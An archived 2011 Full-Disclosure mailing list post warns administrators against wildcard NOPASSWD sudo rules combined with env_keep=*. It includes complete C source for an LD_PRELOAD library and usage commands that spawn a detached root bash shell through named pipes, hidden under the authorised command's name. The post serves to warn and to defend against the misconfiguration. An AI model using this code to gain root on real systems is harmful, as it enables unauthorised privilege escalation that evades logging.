lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-Id: <DC4CBEB6-62E7-4FFC-B81C-58731C00F8C4@jrbobdobbs.org>
Date: Mon, 18 Jul 2011 21:45:41 -0500
From: Doug Huff <dhuff@...obdobbs.org>
To: full-disclosure@...ts.grok.org.uk
Subject: Friendly sudo reminder ...

Think out your rules. Please. Test them! Try to break them yourselves!

This isn't really disclosure but I think this list has an audience that this is appropriate for.

Please think twice about adding wildcard (as in, all users, or effectively all users that will be logging into a machine) sudo rules of the form:

%hugegroup = (root) NOPASSWD: /some/stupid/logging/script

Especially when you also have this in sudoers!:

Defaults .* env_keep=*, .*

There are better ways to accomplish whatever you're trying to accomplish.

What you are doing is broken by design.

This is why:

==BEGIN lol.c==
/*
gcc -std=c89 -pedantic -shared -fPIC -o lol.so lol.c
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>

char *getenv(const char *name) {
 long lol;
 unsetenv("LD_PRELOAD");
 unsetenv("LD_LIBRARY_PATH");
 if((lol = fork()) == 0) {
   setsid();
   umask(0000);
   mkfifo("test-in",0666);
   mkfifo("test-out",0666);
   for (lol=getdtablesize();lol>=0;--lol) close(lol);
   open("test-in",O_RDONLY);
   while(open("test-out",O_WRONLY|O_APPEND) == -1) { sleep(1); }
   dup(1);
   chdir("/");
   execl("/bin/bash","-bash","-",(char *)NULL);
 }
 else exit(0);
 return NULL;
}
==END lol.c==

Usage:

sudo LD_PRELOAD=lol.so /some/stupid/logging/script
tail -f test-out &
while IFS=$'\n\n\n' read line; do echo "$line" done >> test-in

Now your users who you just wanted to log something about have a root shell without a prompt that is not associated with their tty and looks like the command they're authorized to run in the process list. Except the calling sudo process is dead and you can't tell who started it  without fuser/lsof. From the running system; anyways, it will be in the sudo logs assuming they're remote or the abusive user didn't think to clean them up, bad assumptions are what got you here in the first place, though aren't they?

Good job.

Yes I know there are simpler ways to abuse this. (eg, setuid a given file)

Also, while mucking with this, it made me realize an interesting side note about the sudo code:

env_keep=* overrides anything and everything in env_delete.
Even if env_delete is set after env_keep.
Even if env_reset is defined.

This is more an unexpected behavior than anything.

You shouldn't be using env_keep=* in Defaults on a machine where you're giving "untrusted" users a (root) NOPASSWD: rule to work from. Hell, you shouldn't be giving "untrusted" users a (root) NOPASSWD: rule *PERIOD*. For that matter, I can't think of a valid reason to be using env_keep=*. That's just a lazy admin problem, not a sudo problem.

-- 
Douglas Huff
-- 
Douglas Huff



Download attachment "PGP.sig" of type "application/pgp-signature" (882 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ